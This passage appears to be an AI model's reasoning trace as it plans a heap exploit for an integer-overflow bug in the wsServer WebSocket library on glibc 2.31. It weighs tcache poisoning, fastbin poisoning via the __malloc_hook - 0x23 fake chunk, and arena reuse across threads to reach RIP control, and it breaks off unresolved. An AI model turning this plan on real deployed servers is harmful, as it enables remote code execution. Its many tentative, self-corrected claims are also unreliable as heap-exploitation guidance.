But we saw the NON_MAIN_ARENA flag. This means the chunk was NOT in the main arena. So T1 used a non-main arena. If T2 also uses the same non-main arena, they share fastbins.
Hmm, this is getting very complex. Let me reconsider.
Actually, wait. Let me re-examine the GDB output from the previous session. The summary says:
0x7ffff0000c60, size 0x25 (32 | PREV_INUSE | NON_MAIN_ARENA)The address 0x7ffff0000c60 is in the mmap region (high address), which is where thread arenas are allocated. So yes, it's in a thread arena.
But actually, looking more carefully: thread arenas on glibc 2.31 are created via mmap(), and each arena has its own heap segment. The arena pointer is stored in the thread-local thread_arena variable.
For our exploit, the question is: does connection 2's thread use the same arena as connection 1's thread?
Connection 1's thread exits before connection 2's thread starts. When a thread exits, its arena may be reused by a new thread. Specifically, on glibc 2.31, freed arenas are placed on a free list and reused.
So it's very likely that connection 2's thread reuses connection 1's arena! This means they share the same fastbins.
But we still have the tcache problem: connection 2 has a fresh tcache.
Alternative 4: Fill tcache + use fastbins
The plan:
This is more complex but feasible. Let me think about the details.
Actually, there's an even simpler approach.
Alternative 5: Same thread, use the echo on a different connection
The echo server uses ws_sendframe_bcast, which broadcasts to ALL connections on port 8080. This means if we have connection 1 and connection 2 both open, a message on connection 1 triggers a broadcast to ALL connections. But the malloc(response) and free(response) in ws_sendframe_internal happen on connection 1's thread.
What if we reverse the order? Connection 2 sends a legitimate message. The malloc(msg) happens on connection 2's thread. Then onmessage → ws_sendframe_bcast → malloc(response) on connection 2's thread. The broadcast sends to connection 1 (among others), but the malloc/free of the response buffer is on connection 2's thread.
Hmm, this doesn't help with cross-thread tcache.
Alternative 6: Single connection, use the echo path
Wait, I just realized something. The overflow happens during read_single_frame, which is called from next_complete_frame. The error path at line 1713 frees fsd.msg_data. But BEFORE the error path, the write loop returns -1 when next_byte() fails.
What if instead of having the write loop fail, we provide EXACTLY the overflow bytes we need and then close the connection? The write loop will write our overflow data and then fail on the next next_byte(). The key question is: how many bytes does the write loop write before failing?
The write loop iterates fsd->frame_length times. For f1sz=16, frame_length = 0xFFFFFFFFFFFFFFF5. The loop needs to read 0xFFFFFFFFFFFFFFF5 bytes from the socket. We provide some overflow bytes (say 48), then close. The loop writes 48 bytes of our data, then hits EOF.
Actually, wait. The write loop reads from the socket via next_byte(), which buffers up to 2048 bytes at a time. If we sent all our data in one TCP segment, next_byte() would first buffer up to 2048 bytes, then serve them one by one. After consuming the buffer, the next next_byte() call tries to recv() from the socket. If we closed the socket, recv() returns 0 (EOF) or -1 (error), and next_byte() returns -1.
So the write loop writes as many bytes as we send, then fails. The overflow is exactly the number of extra bytes we send (minus the frame 1 data that goes into the legitimate buffer space).
But the problem remains: after the loop fails, the function returns -1, free(msg_data) is called, and the thread exits. No more mallocs on this thread.
Unless... what if there's a way to make the server survive the error and continue processing?
Looking at the code:
// Line 1710-1716
if (wfd->error)
{
free(fsd.msg_data);
wfd->msg = NULL;
return (-1);
}The error flag is set and the function returns -1. Back in ws_establishconnection:
while (next_complete_frame(&wfd) >= 0)
{
// process message
free(wfd.msg);
}
// onclose, cleanup...The while loop exits. No more processing. Thread exits.
Alternative 7: Overflow into the tcache_perthread_struct itself
What if we can overwrite the tcache_perthread_struct of the current thread? This struct is allocated at thread creation time and contains the counts and entry pointers for all tcache bins.
If we can locate the tcache_perthread_struct relative to our overflow buffer, we can directly modify tcache entries. This would let us set any tcache bin's entry pointer to __free_hook, and the NEXT malloc on that thread would return it.
But wait, the tcache_perthread_struct for thread T1 is allocated during the first malloc in T1. The first malloc in T1 happens during the handshake (the calloc(61) in get_handshake_accept). So the tcache struct is allocated early, possibly far from our exploit buffer.
Actually, on glibc 2.31, the tcache_perthread_struct is allocated with malloc(sizeof(tcache_perthread_struct)). The size is: TCACHE_MAX_BINS * sizeof(tcache_entry *) + TCACHE_MAX_BINS * sizeof(char). For 64 bins: 64 * 8 + 64 * 1 = 576 bytes. So malloc(576) → chunk size ~592.
This is a large allocation that would be placed at the start of the thread arena's heap. Our exploit buffer comes later. So we'd need to overflow BACKWARDS, which we can't do.
Or... can we? Our overflow goes forward from the exploit buffer. If the tcache struct is before our buffer in memory, we can't reach it.
Actually, the tcache struct is the FIRST allocation in a new thread arena. It's allocated at the start of the heap segment. Our exploit buffer comes much later. So no, we can't overflow into it.
Alternative 8: Use the arena's bins directly (non-tcache path)
On glibc 2.31, the allocation path is:
The free path is:
For cross-thread exploitation:
So if we can:
This would work! But we need to be more careful with fastbin poisoning because glibc 2.31's fastbin allocator checks the size field:
if (__builtin_expect(fastbin_index(chunksize(victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
}So the target address (where fd points) must have a valid size field at offset +8 that matches the fastbin index. __free_hook is in libc's .bss, which is likely zeroed. A zero size would be fastbin_index(0) = -1 or some invalid index. So we can't directly target __free_hook via fastbin.
But we can use the double-free technique or the fastbin -> smallbin technique. Or we could target a location where we can control the size field.
Actually, on glibc 2.31 with no protections (no PIE, no ASLR, no RELRO), we could target a location in the binary's .bss where we can control the size field. Or we could use the __malloc_hook approach (but __malloc_hook doesn't have a size check issue because it's checked differently).
Wait, actually __malloc_hook was deprecated in glibc 2.34, so on 2.31 it's still available. And __malloc_hook is checked in __libc_malloc BEFORE tcache, fastbin, etc. So even if the allocation path goes through tcache/fastbin, __malloc_hook is called first.
Hmm, but __malloc_hook is called at the START of malloc, not when returning a specific chunk. So we can't use __malloc_hook directly for arbitrary write. We'd still need to redirect the allocation to __free_hook memory, then free() would trigger the hook.
Actually, __malloc_hook is called like this:
void *(*hook) (size_t, const void *) = atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
{
(*hook)(bytes, RETURN_ADDRESS (0));
...
}So if we could set __malloc_hook to system, then malloc would call system(size). But we can't set __malloc_hook directly without an arbitrary write primitive.
OK, I think the cleanest approach for the PoC is:
Use fastbins with a fake chunk at a known address.
Here's the plan:
free(msg_data) → this goes to tcache (still room? Let me check)Hmm, if tcache already has 7 entries, free(msg_data) would go to fastbin instead of tcache. But msg_data is the exploit buffer itself, not the adjacent corrupted chunk. The corrupted adjacent chunk is already in the fastbin (we freed it before the overflow).
Wait, let me reconsider. The flow would be:
This is getting complicated. Let me step back and think about the SIMPLEST possible approach.
Simplest approach: Use __free_hook write on the SAME thread.
Can we somehow get a malloc on the same thread AFTER the overflow?
Looking at the code flow after the overflow:
read_single_frame returns -1next_complete_frame: free(fsd.msg_data) → error, returns -1ws_establishconnection: while loop exits, calls oncloseonclose in echo.c: ws_getaddress(client) → returns static buffer, no mallocclose_client → closes socket, no mallocNo mallocs after the overflow on the same thread.
What about BEFORE the error? After frame 1 (non-FIN) completes successfully, the do-while loop continues to frame 2 (the exploit frame). Between frames, there's no malloc.
What about control frames? Could we interleave a PING frame between frame 1 and frame 2? No, because frame 1 is non-FIN, so only CONT or control frames are expected.
Hmm, what about using the handle_ping_frame function? When a PING is received, the server responds. Let's look at that:
Actually, the server's response to a PING uses ws_sendframe → ws_sendframe_internal → malloc/free. But PINGs are control frames, and they're handled within the same next_complete_frame call. So if we send: [frame1 non-FIN] [PING] [frame2 FIN overflow], the server would:
The PONG response allocation happens between frame 1 and frame 2! But it's on the same thread, same tcache. The PONG response is a small allocation (depending on PING payload size), and it's freed before frame 2 starts.
This doesn't directly help with tcache poisoning, but it's an interesting allocation point.
Actually, let me reconsider the whole approach. Maybe instead of tcache poisoning, we should use a different technique.
Unsorted bin attack: Write a fake unsorted bin chunk whose bk pointer targets a location. When malloc processes the unsorted bin, it writes to bk->fd. This can corrupt arbitrary memory.
But this requires more complex heap shaping and understanding of bin management.
Alternative: Just use the crash itself as the PoC
For a security PoC, we don't necessarily need RIP control. We just need to demonstrate the heap corruption and show it's exploitable. But the user specifically asked for RIP control.
Let me reconsider the cross-thread approach more carefully.
Key question: Do connection 1 and connection 2's threads share the same arena?
On glibc 2.31, the arena allocation logic:
arena_get() which tries to reuse an existing arena or create a new oneIn our case:
So T2 should reuse A1! This means they share fastbins (but not tcache).
OK, let me plan the fastbin approach.
Fastbin poisoning plan:
Connection 1: Fill tcache + put chunk in fastbin
Connection 1: Overflow
Connection 1: Thread exits
free(msg_data) → goes to tcache (if not full) or fastbinConnection 2: Trigger
But fastbin size check: The corrupted fd target must have *(target+8) == 0x30 (for 48-byte fastbin). Where can we find this?
On glibc 2.31 with no protections:
__free_hook is at a known address. __free_hook + 8 is... whatever is after __free_hook in memory.__free_hook is a single void (*volatile __free_hook)(void *, const void *) variable, 8 bytes. The next variable in .bss might have any value.Hmm, we need a location where:
One common trick: use the __malloc_hook area. On glibc 2.31, __malloc_hook - 0x10 + 0x8 = __malloc_hook - 0x8. If we can find what's at __malloc_hook - 8, and if it happens to be 0x30... unlikely.
Another trick: use __free_hook - 8 as the fake chunk start. Then *(__free_hook - 8 + 8) = *__free_hook = 0 (initially NULL). 0 is not 0x30. Doesn't work.
Actually, on glibc 2.31, the common trick for fastbin-to-__free_hook is:
__free_hook - 0x10 as the fake chunk address__free_hook - 0x10 + 8 = __free_hook - 8__free_hook - 8? It depends on the binary layoutLet me check: __free_hook = 0x7ffff7f9de48. So __free_hook - 8 = 0x7ffff7f9de40. What's there? We'd need to check in GDB. It could be part of another variable or padding.
Actually, in glibc 2.31, there's a well-known trick: the value at __free_hook - 8 is typically 0x0 or some other value that doesn't match 0x30. But there's another technique: overwrite __malloc_hook instead.
For __malloc_hook:
__malloc_hook = 0x7ffff7f9bb70 (from our GDB output)__malloc_hook - 8 = 0x7ffff7f9bb68Hmm, neither works directly. We'd need to find a "magic" address where offset +8 contains 0x30.
But wait, there's a classic technique: the 0x7f trick. On glibc 2.31, if we look near __malloc_hook, there's often a 0x7f byte sequence that can serve as a fake size. Specifically, __malloc_hook is preceded by the _IO_wide_data_2 vtable pointer or similar, and the alignment gives us a size of 0x7f.
Let me check: __malloc_hook = 0x7ffff7f9bb70. Let's look at 0x7ffff7f9bb70 - 0x8 = 0x7ffff7f9bb68 and nearby. On many glibc 2.31 builds, the region before __malloc_hook contains a value like 0x00000000000000ff or similar. We'd need to check.
Actually, the well-known address for this trick is __malloc_hook - 0x23:
__malloc_hook - 0x23__malloc_hook - 0x23 + 0x8 = __malloc_hook - 0x1b__malloc_hook - 0x1b through __malloc_hook - 0x14 contains 0x0000000000000007f (the 0x7f is from alignment/metadata)This is the classic __malloc_hook - 0x23 fastbin attack. The fake chunk size is 0x7f, which corresponds to the fastbin for size 0x70 (fastbin_index(0x7f) = 7 for 0x70 size class).
So the plan changes:
__malloc_hook - 0x23__malloc_hook - 0x23system or another function address over __malloc_hook__malloc_hook → RIP controlBut wait, our exploit buffer size is determined by frame 1's payload. To make it a 0x70 chunk, frame 1 payload needs to be in the range that produces request2size(X) = 0x70. That's 0x61 to 0x70 - 1 (97 to 111 bytes). Let me verify: request2size(97) = (97 + 8 + 15) & ~15 = 120 & ~15 = 112 = 0x70. Yes, frame 1 payload of 97-111 bytes gives a 0x70 chunk.
Then the echo response for a 97-byte message: malloc(2 + 97 + 1) = malloc(100) → request2size(100) = (100+8+15)&~15 = 123&~15 = 112 = 0x70. Same bin!
OK, this is getting complex but feasible. Let me think about whether there's a simpler approach.
Actually, you know what? Let me reconsider the tcache approach. The key issue was that tcache is per-thread. But what if connection 1 and connection 2 are served by the SAME thread?
In wsServer, each connection gets its own thread (ws_establishconnection runs in a pthread). Connection 1 is in thread T1, connection 2 is in thread T2. They are different threads.
But what if we DON'T close connection 1? If we keep connection 1 open and just let the server error out on the overflow, the thread T1 exits. Then we open connection 2, which spawns thread T2.
Can we have connection 2 served by the SAME thread? No, because wsServer creates a new thread per connection.
OK wait, I just realized something. Let me re-read the code more carefully:
static void *ws_establishconnection(void *vclient)
Each connection spawns a new thread. After connection 1's thread exits, connection 2's thread starts. They are different threads with different tcache.
So for cross-thread exploitation, we MUST use either:
Let me go with the fastbin approach, specifically the __malloc_hook - 0x23 trick.
Wait, actually there's another option. What if the overflow happens on connection 1, and connection 1 DOESN'T error out? Could we make the overflow NOT trigger the error path?
Looking at the code:
for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
{
cur_byte = next_byte(wfd);
if (cur_byte == -1)
return (-1);
msg[*msg_idx] = cur_byte ^ masks[i % 4];
}The loop runs fsd->frame_length iterations. If we close the socket, next_byte() returns -1, and we exit. But fsd->frame_length is huge, so we can't provide all the bytes.
What if we make fsd->frame_length small but still overflow? For that, we need f1sz + frame_length to wrap to a small value. The only way is for frame_length to be near 2^64. So it's always huge.
Unless... what if we can use a different entry point? What about multiple continuation frames?
Frame 1: non-FIN, payload size A
Frame 2: non-FIN continuation, payload size B
Frame 3: FIN continuation, payload size C (huge, wrapping)
The overflow happens on frame 3. But the write loop for frame 3 still reads C bytes. Same problem.
OK, I think the cross-thread fastbin approach is the way to go. Let me plan it properly.
Actually, wait. Let me reconsider one more time.
What about the __free_hook value at offset -8?
On glibc 2.31 (Ubuntu 20.04), let me check what's at __free_hook - 8. If it happens to be 0x30 or a value with the right fastbin index, we could use a direct __free_hook write.
From the GDB output: __free_hook = 0x7ffff7f9de48. So we need to check *(0x7ffff7f9de40). In a typical glibc 2.31 build, this might be 0 or some other value. Without checking in GDB, we can't be sure.
The __malloc_hook - 0x23 trick is well-known and reliable. Let me use that.
Fastbin attack plan using __malloc_hook:
Phase 1: Shape the heap on connection 1
Send shaping messages to fill tcache for 0x70-bin and place a chunk in fastbin:
Let me recalculate tcache index:
So tcache[5] for 0x70 chunks. Max capacity is 7.
Need 8 frees of 0x70 chunks to fill tcache + put one in fastbin.
The 8th free goes to the arena's fastbin for 0x70 chunks.
Phase 2: Exploit on connection 1
If tcache has 7 entries, malloc(97) gets from tcache. We need the exploit buffer to be adjacent to the fastbin chunk.
Let me think about the layout more carefully.
Actually, the shaping phase frees chunks in a specific order. The last few entries in tcache come from specific positions on the heap. When we then malloc for the exploit buffer, we get the most recently freed chunk (LIFO). Then the echo response gets another from tcache. Then they're both freed again.
This is getting very complicated. The heap layout depends on the exact sequence of mallocs and frees, which includes:
To make this tractable, we should do the shaping to establish a predictable layout, then have the exploit buffer and its adjacent fastbin chunk in known positions.
Let me think about a cleaner shaping sequence:
After handshake: tcache[1]={accept(48)}, tcache[2]={str(64)}, tcache[7]={response(144)} Heap: [freed str(64)] [freed accept(48)] [freed response(144)] [top]
Send 8 shaping messages of size 97 (0x70 chunks):
First few will use tcache (if available) or top. But wait, tcache[5] is empty after handshake. So:
Shaping msg 1:
Shaping msg 2:
Wait, msg = M1 (reused), echo = E1 (reused). Then free(E1) → tcache[5] = {E1}, count=1. free(M1) → tcache[5] = {M1 → E1}, count=2.
This is circular - we're just reusing the same two chunks. We'll never fill tcache this way!
The problem is that each round only has 2 allocations and 2 frees. The freed chunks go back to tcache and are immediately reused.
To fill tcache, we need to accumulate more free chunks. But the echo server always frees after allocating, so the count stays at 2.
Unless... we can use a different allocation pattern. What if some allocations fail to free (e.g., due to error)?
Actually, what about the handshake? It allocates and frees chunks too. But those are different sizes (64, 48, 144), not 0x70.
What if we use the ws_sendframe_bcast behavior? The broadcast sends to ALL connected clients. If we have multiple connections, the response is allocated once and freed once. So the count doesn't increase.
Hmm, this is a fundamental problem. With the echo server, each round-trip produces exactly 2 frees (msg + response) and 2 allocs. The tcache count oscillates between 0 and 2.
To fill tcache, we'd need 7 free chunks without corresponding mallocs. But the echo server's architecture doesn't allow this.
Wait, what about the connection close path? When connection 1 closes, the server calls free(msg_data) on the error path. But that's only 1 extra free.
What if we open MULTIPLE connections and have them all close? Each connection's handshake adds some frees, and each connection's error adds a free.
Let me think... If we open 4 connections and each one does a handshake (3 allocs, 3 frees: 64, 48, 144), then closes normally, we don't get any 0x70 frees.
But if each connection sends messages before closing, the frees happen on each thread's tcache. Different threads, different tcaches.
Hmm. We can't fill tcache beyond 2 entries for a given size using the echo server's normal path on a single connection.
OK, so the fastbin approach won't work because we can't fill tcache.
Let me reconsider...
Back to basics: Can we use tcache poisoning cross-thread?
The issue is that each thread has its own tcache. But what if we can make the SAME thread do the overflow AND the subsequent malloc?
The only way is to do everything on one connection. But after the overflow, the thread errors out.
What about using the validate_utf8_txt path?
After read_single_frame returns, there's:
switch (fsd.opcode) {
case WS_FR_OP_CONT:
case WS_FR_OP_TXT:
validate_utf8_txt(wfd, &fsd);
break;But this is for UTF-8 validation, not memory allocation. And the overflow uses binary frames (opcode 2), which skip UTF-8 validation.
What about the PING/PONG path?
In next_complete_frame, after processing a PING, the server sends a PONG:
case WS_FR_OP_PING:
if (handle_ping_frame(wfd, &fsd) < 0)
goto done;
break;But PING is a control frame, handled separately from data frames. Can we interleave PINGs with our exploit frames?
Looking at the code, the do-while loop processes frames until FIN. Between frame 1 (non-FIN) and frame 2 (FIN continuation), we can't insert a PING because the server expects only CONT or control frames. Wait:
if ((wfd->frame_type == -1 && fsd.opcode == WS_FR_OP_CONT) ||
(wfd->frame_type != -1 && !is_control_frame(fsd.opcode) &&
fsd.opcode != WS_FR_OP_CONT))
{
wfd->error = 1;
break;
}This says: error if (no previous data frame AND opcode is CONT) OR (previous data frame AND opcode is non-control AND non-CONT). So control frames (PING, PONG, CLOSE) ARE allowed between data frames!
So the sequence [frame1 non-FIN BIN] [PING] [frame2 FIN CONT overflow] is valid! And the PING handler allocates and frees memory for the PONG response!
Let me check handle_ping_frame:
Let me look at this function.
Actually, this changes everything! If we can do a PING between the two exploit frames, the PONG response allocation/free happens on the SAME thread. And if we can make the PONG response come from a specific chunk...
But wait, the PONG response is allocated AND freed before frame 2 starts. So the tcache state after PONG is the same as before PONG (assuming the same sizes).
Unless... the PONG response is a DIFFERENT size. If we use a PING with a specific payload size, the PONG response allocation will be a different size, using a different tcache bin. That doesn't help directly.
Hmm. Let me think about this differently.
The key insight: On the SAME thread, we can:
The poisoned tcache has: {exploit_buffer → corrupted_chunk → __free_hook} (or similar). But this tcache dies with the thread.
Can we make the poisoned chunk persist in the arena?
If we fill tcache first, the free(exploit_buffer) goes to fastbin instead. Fastbin chunks are in the arena, which persists across threads.
But we can't fill tcache on a single connection...
Wait, what about multiple concurrent connections?
What if we open connections 1 AND 2 simultaneously? They run in different threads but might share the same arena. If they share the arena:
But connection 1 can't affect connection 2's tcache.
However, if connection 1 fills its tcache AND the arena's fastbin, then connection 2 might be able to use the fastbin.
But we can't fill tcache on connection 1 either (max 2 entries per bin with echo).
New idea: Use the handshake allocations to fill tcache
Each connection's handshake does:
calloc(1, 61) → 64-byte chunk → freed to tcache[2]base64_encode → malloc(31) → 48-byte chunk → freed to tcache[1]malloc(130) → 144-byte chunk → freed to tcache[7]If we open connections rapidly, each thread gets its own tcache. But each thread only has 1 entry per bin.
Wait, but threads exit and their tcaches are destroyed. The chunks are in the arena's heap but not in any tcache.
Actually, when a thread exits and its tcache is not explicitly freed, the tcache entries are "lost" - they're in the heap but not in any free list. This is a memory leak. Subsequent threads can't access them through tcache.
But the chunks ARE freed (the tcache entries were properly freed into tcache). When the thread exits, the tcache_perthread_struct is also "freed" in the sense that the memory is there but not tracked.
Hmm, actually, on glibc 2.31, the tcache_perthread_struct is allocated on the heap but is never explicitly freed. When the thread exits, the struct's memory is still there. The chunks that were in tcache are... well, they were in the tcache linked list. When the thread exits, those entries are lost. The heap space is "freed" in the sense that tcache_put already happened, but the next thread won't see them.
Wait, I think I'm overcomplicating this. Let me look at what actually happens:
Thread T1 starts, first malloc initializes tcache (allocates tcache_perthread_struct from heap)
T1 does handshake: allocates str(64), accept(48), response(144), frees them to tcache
T1 sends shaping messages: more allocs/frees to tcache
T1 does exploit: overflow, then free(msg) to tcache, then exit
Thread T2 starts, first malloc initializes ITS OWN tcache (allocates a NEW tcache_perthread_struct from heap)
T2's tcache is empty. Its mallocs go to fastbins/bins/top.
So the poisoned chunks in T1's tcache are effectively "leaked" - they're marked as free in the tcache linked list, but T2 can't see them. They're also not in the arena's bins. They're in limbo.
This means the tcache poisoning approach is fundamentally broken for cross-thread exploitation, at least with the current architecture.
Let me reconsider the fastbin approach with the tcache leak problem in mind.
After T1 exits, the chunks in T1's tcache are leaked. This reduces the number of free chunks available in the heap for T2. But chunks that were freed to fastbins (beyond tcache capacity) ARE accessible to T2.
So the plan is:
This is the fundamental problem. We can't get 7 entries in tcache on a single connection.
Alternative: Use a different target that doesn't require tcache poisoning or fastbin poisoning.
What about overwriting a function pointer in the ws_connection struct? The struct is in BSS (client_socks array). But our overflow is on the heap, not in BSS. We can't reach BSS from the heap.
What about overwriting the onclose or onmessage function pointers in the ws_server struct? Again, these are in the ws_connection struct in BSS.
What about overwriting the vtable of a FILE struct (stdout)? stdout is a FILE* in libc. If we can overwrite its vtable, we can redirect execution when printf is called. But stdout is in libc's data segment, far from our heap buffer.
Alternative: Use the __malloc_hook with a different technique.
What if we can write to __malloc_hook directly through the overflow? If __malloc_hook is adjacent to something on the heap... No, it's in libc's BSS, not on the heap.
Alternative: Use __free_hook with a different technique.
Same issue - __free_hook is in libc's BSS.
OK, I think the ONLY viable approach for cross-thread exploitation with the echo server is to somehow get a chunk into the arena-level free lists (fastbins or bins) that has a corrupted fd/bk.
The challenge is getting chunks into those lists. tcache has priority, and tcache never fills beyond 2 entries on a single connection.
Wait! What about multiple connections' handshakes?
If we rapidly open and close connections, each connection's handshake does frees on that thread's tcache. When the thread exits, the tcache entries are "lost". But what if we can somehow get the thread to exit BEFORE freeing to tcache?
Actually, the handshake frees happen during the handshake, before the thread exits. So they always go to the current thread's tcache.
Another idea: What if we use a larger overflow to corrupt the tcache_perthread_struct of a DIFFERENT thread?
Each thread's tcache_perthread_struct is allocated on the heap. If we can locate it and overwrite it with our overflow, we can set arbitrary tcache entries for that thread.
But the tcache_perthread_struct for T2 is allocated when T2 does its first malloc. This happens AFTER T1 has exited. So at the time of our overflow, T2's tcache doesn't exist yet.
What about T1's own tcache_perthread_struct? If we can overwrite T1's tcache entries, we could set a tcache[1] entry to __free_hook. Then the NEXT malloc on T1 for a 48-byte chunk would return __free_hook.
But after the overflow, the only remaining mallocs on T1 are... none. The thread exits.
Unless we can trigger a malloc on T1 after the overflow. But the code path doesn't allow this.
OK, I think I need to consider a completely different approach.
Approach: Unsorted bin attack
Instead of corrupting a single chunk's fd/bk, we can corrupt an unsorted bin chunk to trigger a write to an arbitrary address. This doesn't require the target to have a specific size value.
But getting a chunk into the unsorted bin requires:
For 0x90+ chunks, frees go to unsorted bin (after tcache). If we can fill tcache for that bin and then free a large chunk, it goes to unsorted bin.
But we still have the tcache-filling problem.
Approach: Use the echo's onclose callback
The onclose callback in echo.c does:
void onclose(ws_cli_conn_t client)
{
char *cli;
cli = ws_getaddress(client);
printf("Connection closed, addr: %s\n", cli);
}ws_getaddress returns a pointer to client->ip, which is a static buffer. No malloc. printf may or may not allocate.
After onclose, the code does:
clse_thrd = client->close_thrd;
if (clse_thrd) { ... }
close_client(client, 1);No mallocs here.
Approach: Overflow into the FILE stdout buffer*
When printf is first called, it allocates a buffer for stdout (if not setvbuf'd). This buffer is typically 8192 bytes. If the printf in onopen/onmessage allocates this buffer, it's a large chunk on the heap.
But this is a one-time allocation. It won't be freed.
OK, I'm going in circles. Let me think about this from a completely different angle.
What if we can make the server call free() on a controlled pointer?
The error path does free(fsd.msg_data). After the overflow, msg_data points to our buffer. But we can't control WHERE the free happens.
What about the ws_sendframe_bcast in onmessage? It allocates a response and frees it. But onmessage is only called for COMPLETE messages (FIN=1). Our exploit message is split into frame 1 (non-FIN) and frame 2 (FIN with overflow). The onmessage callback is only called after the complete message is received. But frame 2's write loop errors out, so the message is never complete. onmessage is never called.
What about a second message AFTER the exploit?
After the exploit frames error out, the while loop in ws_establishconnection exits. No more messages.
But what if we send a COMPLETE, valid message BEFORE the exploit frames? That message would be processed normally (onmessage called, echo sent, msg freed). Then the exploit frames start.
This is already what the shaping phase does! The shaping messages are complete, valid messages. Each one triggers:
These mallocs/frees happen BEFORE the exploit. They shape the heap.
The problem is that after the exploit, there's nothing more on this thread.
What if the exploit is NOT the last thing on the thread?
What if after the exploit, we send more data that the server processes? But the error flag is set, and the while loop exits.
What if we send the exploit data in a way that doesn't trigger the error? We'd need the write loop to complete normally. But the frame length is ~2^64, so it can't complete.
What if we use a different overflow length?
Can we make frame_length wrap to a SMALL but non-zero value that we CAN provide?
For frame_size to pass the check: frame_size = f1sz + frame_length ≤ MAX_FRAME_LENGTH = 16MB.
If f1sz + frame_length doesn't wrap (i.e., the sum is genuinely small), then we'd need frame_length to be small. But then realloc(msg, msg_idx + frame_length + 1) would be a legitimate allocation, and the write loop would write frame_length bytes normally. No overflow.
The overflow requires the sum to wrap. And wrapping requires frame_length to be near 2^64. So the write loop is always going to try to read ~2^64 bytes.
What about the frame_size overflow affecting a DIFFERENT code path?
Looking at the code, frame_size is used:
*frame_size > 0 for FIN handlingWhat if *frame_size wraps to exactly 0? Then at line 1531, fsd.is_fin && *frame_size > 0 would be false, and the FIN handling would be skipped. But the FIN flag is set, so the do-while loop exits.
After the loop exits (because is_fin), the code at line 1710 checks for errors. If no error was set, it returns success with wfd.msg = fsd.msg_data. Then onmessage is called!
So if we can:
Then *frame_size = f1sz + (2^64 - f1sz) = 0 (mod 2^64). And:
*frame_size > MAX_FRAME_LENGTH → 0 > 16MB → false → passes!realloc(msg, f1sz + (2^64 - f1sz) + 1) = realloc(msg, 1) → tiny, same pointer(2^64 - f1sz) bytes → huge → hits EOF → returns -1Still the same problem. The write loop tries to read too many bytes.
But wait, what if frame_length = 0? Then the check at line 1501 if (fsd->frame_length > 0) is false, so the realloc and write loop are SKIPPED! And *frame_size += 0 = f1sz. If f1sz ≤ MAX_FRAME_LENGTH, the check passes.
But then there's no overflow either. frame_length=0 means nothing is written.
What about frame_length = 1? Then *frame_size = f1sz + 1. Realloc to f1sz + 1 + 1 = f1sz + 2. Write loop writes 1 byte. No overflow.
I keep coming back to the same conclusion: for an overflow, we need a huge frame_length, which means the write loop runs for ~2^64 iterations, which always fails.
Unless we can make the write loop succeed by providing data?
The write loop reads bytes from the socket. If we provide all the data the loop needs, it completes successfully. But frame_length ≈ 2^64, so we'd need to send ~2^64 bytes. Not possible.
What about integer overflow in the loop counter?
The loop is: for (i = 0; i < fsd->frame_length; i++, (*msg_idx)++)
i is uint64_t. After i reaches 2^64 - 1, it wraps to 0. Then 0 < fsd->frame_length is true, so the loop continues. It would wrap around again and again... effectively an infinite loop.
Actually no, i goes 0, 1, 2, ..., 2^64-1, then wraps to 0. At that point, 0 < frame_length is true (frame_length is huge), so it continues. But msg_idx has also been incrementing: *msg_idx goes from f1sz to f1sz + frame_length, which wraps to f1sz + small_value. Then msg[*msg_idx] writes to a specific offset.
But the loop keeps running! It's an infinite loop unless next_byte() returns -1.
OK, I think I need to accept that the cross-thread tcache issue is fundamental and work around it.
Revised plan: Single-connection approach with creative heap manipulation
The key realization: we need the allocation AND free that triggers the exploit to happen on the SAME thread. The only allocations/frees after the overflow on the same thread are:
free(fsd.msg_data) at line 1713close_client (no malloc/free)So there's only ONE free after the overflow. We need that free to trigger the exploit.
Approach: Overwrite the tcache_perthread_struct counts
T1's tcache_perthread_struct is on the heap. If our overflow can reach it, we can modify the counts array to make tcache think a certain bin has entries when it doesn't. This could cause tcache_get to return a chunk from a corrupted entries[] pointer.
But the entries[] pointer for a bin that was never used would be NULL. We'd need to set BOTH the count AND the entries pointer.
The tcache_perthread_struct layout:
typedef struct tcache_perthread_struct {
char counts[TCACHE_MAX_BINS]; // 64 bytes
tcache_entry *entries[TCACHE_MAX_BINS]; // 64 * 8 = 512 bytes
} tcache_perthread_struct;Total: 576 bytes. The counts are at offset 0, entries at offset 64.
If we can overwrite entries[X] with __free_hook and counts[X] with a non-zero value, then malloc(size_for_bin_X) would return __free_hook.
But the tcache_perthread_struct is typically the FIRST allocation on the heap (for a thread arena). Our overflow buffer comes later. The struct is BEFORE our buffer, and we can only overflow FORWARD. So we can't reach it.
Unless... the tcache_perthread_struct is after our buffer. Let me think about when it's allocated.
For the main thread, the tcache struct is allocated during the first malloc (in __libc_malloc → tcache_init). For thread arenas, it's allocated during arena_get → arena_thread_freeres... no, actually tcache_init is called per-thread.
In our case:
calloc(1, 61) in get_handshake_accept__libc_malloc checks if tcache is initialized. If not, tcache_init() allocates the tcache struct.tcache_init() does malloc(sizeof(tcache_perthread_struct)) → malloc(576) → chunk size ~592.So the tcache struct is the FIRST chunk on the thread's heap. All subsequent allocations come after it. Our overflow buffer is way after the tcache struct. We can't reach it with a forward overflow.
Wait, what about the entries[] array itself?
If we overflow into a chunk that was PREVIOUSLY a tcache entry, and that chunk's memory (specifically the first 8 bytes of user data, which is the fd/next pointer) is being read by tcache_get... no, the tcache entries are just linked list nodes in freed chunks. The entries[] array in tcache_perthread_struct points to the head of each bin's list.
OK, I'm convinced that cross-thread exploitation via tcache is not feasible with this specific vulnerability and server architecture. Let me look for a different angle entirely.
New approach: Make the server write to __free_hook during the overflow itself
What if we can control WHERE the overflow data is written? The overflow writes to msg[*msg_idx] where *msg_idx starts at f1sz and increments. If we could make msg point to an interesting address...
But msg is the realloc'd buffer. It's a heap address. We can't control it.
What about making *msg_idx very large (wrapping around to point to __free_hook's address)? *msg_idx starts at f1sz and increments by 1 for each byte. After frame_length iterations, *msg_idx = f1sz + frame_length. But frame_length is ~2^64, so *msg_idx wraps around many times. The write goes to msg[*msg_idx] which wraps around the address space... but msg is a heap pointer, and adding ~2^64 to it wraps the address, potentially pointing anywhere.
